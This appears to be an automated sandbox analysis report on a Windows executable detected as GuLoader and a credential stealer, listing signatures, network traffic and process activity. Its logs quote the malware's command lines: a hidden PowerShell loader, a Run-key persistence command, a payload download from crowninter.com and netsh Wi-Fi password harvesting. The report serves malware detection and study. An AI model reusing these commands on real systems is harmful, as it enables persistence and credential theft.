Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1430487
MD5:	afaedf2ff4dc43d62b33b003a1a501ab
SHA1:	9efe783f2dace329faa38ecefe77b6359dab3bd8
SHA256:	1eccc2406bb9358ea0d3290d9b06433732fab544690fbeb65c93a3175ba30422
Infos:

Detection

GuLoader, PXRECVOWEIWOEI Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: Capture Wi-Fi password

Yara detected GuLoader

Yara detected PXRECVOWEIWOEI Stealer

Check if machine is in data center or colocation facility

Obfuscated command line found

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: ImagingDevices Unusual Parent/Child Processes

Suspicious powershell command line found

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Uses netsh to modify the Windows network and firewall settings

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the product ID of Windows

Queries the volume information (name, serial number etc) of a device

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Potential Dosfuscation Activity

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses insecure TLS / SSL version for HTTPS connection

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Signatures

Uses 32bit PE files

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 104.21.71.78:443 -> 192.168.2.16:49705 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.71.78:443 -> 192.168.2.16:49709 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 104.21.71.78:443 -> 192.168.2.16:49711 version: TLS 1.2

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Pitapats\gimmickry\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Pitapats\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Curan158\

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

May check the online IP address of the machine

Source: unknown	DNS query: name: whatismyipaddressnow.co
Source: unknown	DNS query: name: whatismyipaddressnow.co
Source: unknown	DNS query: name: icanhazip.com
Source: unknown	DNS query: name: icanhazip.com
Source: unknown	DNS query: name: ip-api.com

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /jAscfKcoNcxeCpbJ57.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: crowninter.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /jAscfKcoNcxeCpbJ57.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: crowninter.comCache-Control: no-cache

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 104.21.71.78:443 -> 192.168.2.16:49705 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.71.78:443 -> 192.168.2.16:49709 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /jAscfKcoNcxeCpbJ57.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: crowninter.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jAscfKcoNcxeCpbJ57.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: crowninter.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: crowninter.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: unknown

HTTPS traffic detected: 104.21.71.78:443 -> 192.168.2.16:49711 version: TLS 1.2

Creates a window with clipboard capturing capabilities

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Window created: window name: CLIPBRDWNDCLASS

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Uses 32bit PE files

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Uses reg.exe to modify the Windows registry

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)"

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@54/21@5/39

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Roaming\Pitapats

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_03
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2756:120:WilError_03
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Mutant created: \Sessions\1\BaseNamedObjects\651689
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5528:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\nsvF7C9.tmp

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)"
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: riched20.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: usp10.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: msls31.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
